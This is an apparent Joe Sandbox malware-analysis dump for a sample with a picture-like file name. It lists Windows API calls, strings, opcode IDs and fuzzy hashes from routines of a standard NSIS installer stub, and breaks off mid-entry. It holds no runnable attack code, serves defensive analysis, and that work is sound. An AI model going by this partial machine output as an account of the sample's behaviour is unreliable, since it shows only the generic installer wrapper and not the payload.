                                        • Source File: 00000004.00000002.2886748855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000004.00000002.2886722224.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886766178.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886784608.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886807482.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
                                        • String ID:
                                        • API String ID: 1860320154-0
                                        • Opcode ID: bb6cbcf9a1c545d3154f604be3372cfdd7ba41936c4c4c21433e3a1b8f36b1fe
                                        • Instruction ID: 7c61018aff81ba8050a36ffdf8d01ac8e149416bf37329b2a87c27abd1a4edd3
                                        • Opcode Fuzzy Hash: bb6cbcf9a1c545d3154f604be3372cfdd7ba41936c4c4c21433e3a1b8f36b1fe
                                        • Instruction Fuzzy Hash: 60C1F4B1600205ABD7206F61EE49E2B3BBCEB85749F51053EF681B11F1CB799842DB2D
                                        APIs
                                          • Part of subcall function 004066B5: GetModuleHandleA.KERNEL32(?,00000000,?,0040351A,0000000C), ref: 004066C7
                                          • Part of subcall function 004066B5: GetProcAddress.KERNEL32(00000000,?), ref: 004066E2
                                        • lstrcatA.KERNEL32(00436000,0042A488,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A488,00000000,00000002,74DF3410,00436400,?,00435000,0000000A,0000000C), ref: 00403B11
                                        • lstrlenA.KERNEL32(0042DFC0,?,?,?,0042DFC0,00000000,00435400,00436000,0042A488,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A488,00000000,00000002,74DF3410), ref: 00403B86
                                        • lstrcmpiA.KERNEL32(?,.exe), ref: 00403B99
                                        • GetFileAttributesA.KERNEL32(0042DFC0,?,00435000,0000000A,0000000C), ref: 00403BA4
                                        • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,00435400), ref: 00403BED
                                          • Part of subcall function 004061EB: wsprintfA.USER32 ref: 004061F8
                                        • RegisterClassA.USER32(0042E7C0), ref: 00403C2A
                                        • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403C42
                                        • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403C77
                                        • ShowWindow.USER32(00000005,00000000,?,00435000,0000000A,0000000C), ref: 00403CAD
                                        • GetClassInfoA.USER32(00000000,RichEdit20A,0042E7C0), ref: 00403CD9
                                        • GetClassInfoA.USER32(00000000,RichEdit,0042E7C0), ref: 00403CE6
                                        • RegisterClassA.USER32(0042E7C0), ref: 00403CEF
                                        • DialogBoxParamA.USER32(?,00000000,00403E33,00000000), ref: 00403D0E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2886748855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000004.00000002.2886722224.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886766178.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886784608.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886807482.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                        • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                        • API String ID: 1975747703-2904746566
                                        • Opcode ID: cb143dc0267d759a9cea0cd43f37dda2b3b0fb558001b9f08e92126bf8417459
                                        • Instruction ID: 062707365540321fd28ddc31094d52b8ee002564e62880c3064c6a51a35bf8f0
                                        • Opcode Fuzzy Hash: cb143dc0267d759a9cea0cd43f37dda2b3b0fb558001b9f08e92126bf8417459
                                        • Instruction Fuzzy Hash: 1A61B4706442006EE620BF629D46F273ABCEB44B49F44443FF945B62E2DB7D99068A3D
                                        APIs
                                        • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404523
                                        • GetDlgItem.USER32(00000000,000003E8), ref: 00404537
                                        • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404555
                                        • GetSysColor.USER32(?), ref: 00404566
                                        • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404575
                                        • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404584
                                        • lstrlenA.KERNEL32(?), ref: 00404587
                                        • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404596
                                        • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004045AB
                                        • GetDlgItem.USER32(?,0000040A), ref: 0040460D
                                        • SendMessageA.USER32(00000000), ref: 00404610
                                        • GetDlgItem.USER32(?,000003E8), ref: 0040463B
                                        • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040467B
                                        • LoadCursorA.USER32(00000000,00007F02), ref: 0040468A
                                        • SetCursor.USER32(00000000), ref: 00404693
                                        • LoadCursorA.USER32(00000000,00007F00), ref: 004046A9
                                        • SetCursor.USER32(00000000), ref: 004046AC
                                        • SendMessageA.USER32(00000111,00000001,00000000), ref: 004046D8
                                        • SendMessageA.USER32(00000010,00000000,00000000), ref: 004046EC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2886748855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000004.00000002.2886722224.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886766178.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886784608.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886807482.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                        • String ID: N$cD@
                                        • API String ID: 3103080414-2800326580
                                        • Opcode ID: 0d552c78708d8b6c3e6a9e133e2a55d80eb6ec1b6100387134d0e82e0d806a6f
                                        • Instruction ID: 43684ccacc2d8fb7b4e0a1eb44f66cc69a0b9750f41782283b4d1566cbdab7d9
                                        • Opcode Fuzzy Hash: 0d552c78708d8b6c3e6a9e133e2a55d80eb6ec1b6100387134d0e82e0d806a6f
                                        • Instruction Fuzzy Hash: 106193B1A00209BBDB109F61DD45F6A3BA9FB84754F10443AFB057B1D1C7B8A951CF98
                                        APIs
                                        • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                        • BeginPaint.USER32(?,?), ref: 00401047
                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                        • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                        • DeleteObject.GDI32(?), ref: 004010ED
                                        • CreateFontIndirectA.GDI32(?), ref: 00401105
                                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                        • DrawTextA.USER32(00000000,0042E820,000000FF,00000010,00000820), ref: 00401156
                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                        • DeleteObject.GDI32(?), ref: 00401165
                                        • EndPaint.USER32(?,?), ref: 0040116E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2886748855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000004.00000002.2886722224.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886766178.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886784608.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886807482.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                        • String ID: F
                                        • API String ID: 941294808-1304234792
                                        • Opcode ID: 036095489b744d328a0284f3af7f80ab3f3a11b0609df675fc3b160fbcb80c66
                                        • Instruction ID: 3ddd31971ff36fa992edb7b0d2f538087f25d398410520a6441e316a3758f4e4
                                        • Opcode Fuzzy Hash: 036095489b744d328a0284f3af7f80ab3f3a11b0609df675fc3b160fbcb80c66
                                        • Instruction Fuzzy Hash: 2E419C71800209AFCB059F95CE459BFBBB9FF44314F00842EF591AA1A0CB349955DFA4
                                        APIs
                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00406087,?,?), ref: 00405F27
                                        • GetShortPathNameA.KERNEL32(?,0042C218,00000400), ref: 00405F30
                                          • Part of subcall function 00405D85: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D95
                                          • Part of subcall function 00405D85: lstrlenA.KERNEL32(00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405DC7
                                        • GetShortPathNameA.KERNEL32(?,0042C618,00000400), ref: 00405F4D
                                        • wsprintfA.USER32 ref: 00405F6B
                                        • GetFileSize.KERNEL32(00000000,00000000,0042C618,C0000000,00000004,0042C618,?,?,?,?,?), ref: 00405FA6
                                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405FB5
                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FED
                                        • SetFilePointer.KERNEL32(0040A3D0,00000000,00000000,00000000,00000000,0042BE18,00000000,-0000000A,0040A3D0,00000000,[Rename],00000000,00000000,00000000), ref: 00406043
                                        • GlobalFree.KERNEL32(00000000), ref: 00406054
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040605B
                                          • Part of subcall function 00405E20: GetFileAttributesA.KERNEL32(00000003,00402F71,00436C00,80000000,00000003,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E24
                                          • Part of subcall function 00405E20: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E46
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2886748855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000004.00000002.2886722224.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886766178.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886784608.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886807482.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                        • String ID: %s=%s$[Rename]
                                        • API String ID: 2171350718-1727408572
                                        • Opcode ID: 7fab33d9305e3d35eb4d6262b18c9d607ce8d1b4ed31532576ac5101631bdde8
                                        • Instruction ID: da8ce3bfdf00fcfed17b5edaf8d9799a0bf0ff3a482d4f6cc2fc7d52a36fe9c3
                                        • Opcode Fuzzy Hash: 7fab33d9305e3d35eb4d6262b18c9d607ce8d1b4ed31532576ac5101631bdde8
                                        • Instruction Fuzzy Hash: 3D3135312407117BC220AB65AC88F6B3A5CDF41758F16003BFA02F72D2DE7C98558ABD
                                        APIs
                                        • GetDlgItem.USER32(?,000003FB), ref: 0040480E
                                        • SetWindowTextA.USER32(00000000,?), ref: 00404838
                                        • SHBrowseForFolderA.SHELL32(?,00429860,?), ref: 004048E9
                                        • CoTaskMemFree.OLE32(00000000), ref: 004048F4
                                        • lstrcmpiA.KERNEL32(0042DFC0,0042A488), ref: 00404926
                                        • lstrcatA.KERNEL32(?,0042DFC0), ref: 00404932
                                        • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404944
                                          • Part of subcall function 00405987: GetDlgItemTextA.USER32(?,?,00000400,0040497B), ref: 0040599A
                                          • Part of subcall function 00406587: CharNextA.USER32(0000000C,*?|<>/":,00000000,?,74DF3410,00436400,00435000,004033B3,00436400,00436400,004036B5,?,00000008,0000000A,0000000C), ref: 004065DF
                                          • Part of subcall function 00406587: CharNextA.USER32(0000000C,0000000C,0000000C,00000000,?,74DF3410,00436400,00435000,004033B3,00436400,00436400,004036B5,?,00000008,0000000A,0000000C), ref: 004065EC
                                          • Part of subcall function 00406587: CharNextA.USER32(0000000C,?,74DF3410,00436400,00435000,004033B3,00436400,00436400,004036B5,?,00000008,0000000A,0000000C), ref: 004065F1
                                          • Part of subcall function 00406587: CharPrevA.USER32(0000000C,0000000C,74DF3410,00436400,00435000,004033B3,00436400,00436400,004036B5,?,00000008,0000000A,0000000C), ref: 00406601
                                        • GetDiskFreeSpaceA.KERNEL32(00429458,?,?,0000040F,?,00429458,00429458,?,00000001,00429458,?,?,000003FB,?), ref: 00404A02
                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404A1D
                                          • Part of subcall function 00404B76: lstrlenA.KERNEL32(0042A488,0042A488,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A91,000000DF,00000000,00000400,?), ref: 00404C14
                                          • Part of subcall function 00404B76: wsprintfA.USER32 ref: 00404C1C
                                          • Part of subcall function 00404B76: SetDlgItemTextA.USER32(?,0042A488), ref: 00404C2F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2886748855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000004.00000002.2886722224.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886766178.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886784608.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886807482.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                        • String ID: A
                                        • API String ID: 2624150263-3554254475
                                        • Opcode ID: 65010f81d111a107078dfd81cf5a0743528becb2b33aaf5c40ee420fb77efb02
                                        • Instruction ID: f53f9ae5ebeaccab956e1b2ad526c51027fc30446c854342799b5ba7b8d0bc76
                                        • Opcode Fuzzy Hash: 65010f81d111a107078dfd81cf5a0743528becb2b33aaf5c40ee420fb77efb02
                                        • Instruction Fuzzy Hash: BAA172F1A00209ABDB11AFA5CD45AAF76B8EF84314F14807BF611B62D1D77C89418F6D
                                        APIs
                                        • GetTickCount.KERNEL32 ref: 00402F42
                                        • GetModuleFileNameA.KERNEL32(00000000,00436C00,00000400,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00402F5E
                                          • Part of subcall function 00405E20: GetFileAttributesA.KERNEL32(00000003,00402F71,00436C00,80000000,00000003,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E24
                                          • Part of subcall function 00405E20: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E46
                                        • GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,00435C00,00435C00,00436C00,00436C00,80000000,00000003,?,?,00403722,?,?,00000008), ref: 00402FAA
                                        • GlobalAlloc.KERNEL32(00000040,00000008,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 004030E0
                                        Strings
                                        • Error launching installer, xrefs: 00402F81
                                        • Inst, xrefs: 00403016
                                        • 8TA, xrefs: 00402FBF
                                        • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00403107
                                        • Null, xrefs: 00403028
                                        • soft, xrefs: 0040301F
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2886748855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000004.00000002.2886722224.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886766178.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886784608.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886807482.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                        • String ID: 8TA$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                        • API String ID: 2803837635-1977864323
                                        • Opcode ID: 0471a428ad8d14c201eb1a2d05761fa305cb24827ec1de9291aed20d949dc82a
                                        • Instruction ID: 36ae42bb95036f4d014ef15fc9cddc9856debb4c315f30e11e88dada5eb0dcac
                                        • Opcode Fuzzy Hash: 0471a428ad8d14c201eb1a2d05761fa305cb24827ec1de9291aed20d949dc82a
                                        • Instruction Fuzzy Hash: 6C510531A01214ABDB209F64DE85B9E7EBCEB0435AF60403BF504B62D2C77C9E418B6D
                                        APIs
                                        • GetSystemDirectoryA.KERNEL32(0042DFC0,00000400), ref: 00406452
                                        • GetWindowsDirectoryA.KERNEL32(0042DFC0,00000400,?,00429C68,00000000,00405409,00429C68,00000000,00000000), ref: 00406468
                                        • SHGetPathFromIDListA.SHELL32(00000000,0042DFC0,?,00405409,00000007,?,00429C68,00000000,00405409,00429C68,00000000), ref: 004064C7
                                        • CoTaskMemFree.OLE32(00000000,?,00405409,00000007,?,00429C68,00000000,00405409,00429C68,00000000), ref: 004064D0
                                        • lstrcatA.KERNEL32(0042DFC0,\Microsoft\Internet Explorer\Quick Launch,?,00429C68,00000000,00405409,00429C68,00000000), ref: 004064F4
                                        • lstrlenA.KERNEL32(0042DFC0,?,00429C68,00000000,00405409,00429C68,00000000,00000000,?,74DF23A0), ref: 00406546
                                        Strings
                                        • Software\Microsoft\Windows\CurrentVersion, xrefs: 00406423
                                        • \Microsoft\Internet Explorer\Quick Launch, xrefs: 004064EE
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2886748855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000004.00000002.2886722224.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886766178.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886784608.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886807482.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                        • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                        • API String ID: 4024019347-730719616
                                        • Opcode ID: 4f035e6071b976de3853a8921acfec8e3f6599c5ec55354fa89b4c1c1d35bef3
                                        • Instruction ID: dd0baf6a3bef4ec2da884e75bd50347be15db8678cbe9dcd308fcfbafd937b9a
                                        • Opcode Fuzzy Hash: 4f035e6071b976de3853a8921acfec8e3f6599c5ec55354fa89b4c1c1d35bef3
                                        • Instruction Fuzzy Hash: 1361F371900210AADB219F24DD85B7E7BA4AB05714F12813FF807B62C1C67D8966DB9D
                                        APIs
                                        • GetWindowLongA.USER32(?,000000EB), ref: 004043B1
                                        • GetSysColor.USER32(00000000), ref: 004043EF
                                        • SetTextColor.GDI32(?,00000000), ref: 004043FB
                                        • SetBkMode.GDI32(?,?), ref: 00404407
                                        • GetSysColor.USER32(?), ref: 0040441A
                                        • SetBkColor.GDI32(?,?), ref: 0040442A
                                        • DeleteObject.GDI32(?), ref: 00404444
                                        • CreateBrushIndirect.GDI32(?), ref: 0040444E
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2886748855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000004.00000002.2886722224.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886766178.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886784608.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886807482.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                        • String ID:
                                        • API String ID: 2320649405-0
                                        • Opcode ID: 8c62cc7b680d0f9fb00056791eeffc6cd2931fdceedc16941688e7b217811201
                                        • Instruction ID: 0cb6da092899fbd89936ee00678fc1211e2f1892718b1dfe439ae8b372ce6297
                                        • Opcode Fuzzy Hash: 8c62cc7b680d0f9fb00056791eeffc6cd2931fdceedc16941688e7b217811201
                                        • Instruction Fuzzy Hash: E32177715007049BCF309F78D948B577BF8AF81714B04893DEAA6B26E1C734E948CB58
                                        APIs
                                        • lstrlenA.KERNEL32(00429C68,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000,?), ref: 0040540A
                                        • lstrlenA.KERNEL32(004032C3,00429C68,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000), ref: 0040541A
                                        • lstrcatA.KERNEL32(00429C68,004032C3,004032C3,00429C68,00000000,?,74DF23A0), ref: 0040542D
                                        • SetWindowTextA.USER32(00429C68,00429C68), ref: 0040543F
                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405465
                                        • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040547F
                                        • SendMessageA.USER32(?,00001013,?,00000000), ref: 0040548D
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2886748855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000004.00000002.2886722224.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886766178.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886784608.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886807482.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                        • String ID:
                                        • API String ID: 2531174081-0
                                        • Opcode ID: 8f7b4f01caaf6d1e12ead9ba64632b4b1eb20c2348e45d3c9541951699492127
                                        • Instruction ID: 7fccb86dafa480228006d80d04b82b7e1b017f67e9930a1aa42837d262fd4390
                                        • Opcode Fuzzy Hash: 8f7b4f01caaf6d1e12ead9ba64632b4b1eb20c2348e45d3c9541951699492127
                                        • Instruction Fuzzy Hash: 81218971900118BBDF11AFA5CD85ADEBFA9EB05354F14807AF944B6291C6788E81CFA8
                                        APIs
                                        • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404C9B
                                        • GetMessagePos.USER32 ref: 00404CA3
                                        • ScreenToClient.USER32(?,?), ref: 00404CBD
                                        • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404CCF
                                        • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404CF5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2886748855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000004.00000002.2886722224.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886766178.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886784608.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886807482.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: Message$Send$ClientScreen
                                        • String ID: f
                                        • API String ID: 41195575-1993550816
                                        • Opcode ID: fbe7a9a9d251da3c9c448e6b1369ef84c2200939816a620fb3ee489aa4668e2c
                                        • Instruction ID: 8ac1eb656b69e247d5f05692bef4687e0c0d70a1275d834663b2b8f38aac2a1a
                                        • Opcode Fuzzy Hash: fbe7a9a9d251da3c9c448e6b1369ef84c2200939816a620fb3ee489aa4668e2c
                                        • Instruction Fuzzy Hash: B6019E71900218BAEB00DB94DD81FFFBBBCAF44711F10012BBA01B61C0C7B899418BA4
                                        APIs
                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E65
                                        • MulDiv.KERNEL32(?,00000064,?), ref: 00402E90
                                        • wsprintfA.USER32 ref: 00402EA0
                                        • SetWindowTextA.USER32(?,?), ref: 00402EB0
                                        • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402EC2
                                        Strings
                                        • verifying installer: %d%%, xrefs: 00402E9A
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2886748855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000004.00000002.2886722224.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886766178.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886784608.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886807482.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: Text$ItemTimerWindowwsprintf
                                        • String ID: verifying installer: %d%%
                                        • API String ID: 1451636040-82062127
                                        • Opcode ID: 008e47a76e30b834da19422bd6ea308201e4826492d01be12a9765c28616dd6c
                                        • Instruction ID: 08bf30aeaad7c3c0f985f8b81484beb4ade113f1463dbf8d033ac048ea6a4a00
                                        • Opcode Fuzzy Hash: 008e47a76e30b834da19422bd6ea308201e4826492d01be12a9765c28616dd6c
                                        • Instruction Fuzzy Hash: EF016270640208FBEF209F60DE09EEE3769AB10304F008039FA06B51E1DBB89D56CF99
                                        APIs
                                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040665E
                                        • wsprintfA.USER32 ref: 00406697
                                        • LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 004066AB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2886748855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000004.00000002.2886722224.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886766178.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886784608.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                         • Associated: 00000004.00000002.2886807482.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: DirectoryLibraryLoadSystemwsprintf
                                        • String ID: %s%s.dll$UXTHEME$\
                                        • API String ID: 2200240437-4240819195
                                        • Opcode ID: bb0c7447bffed25a47ff2517fd87417c43c35d72d0d658bdc18f354cf5cb2530
                                        • Instruction ID: e759eb08ac56218b9122c2e4f19d02add1096545fd4a6e696b7e3c492baae584
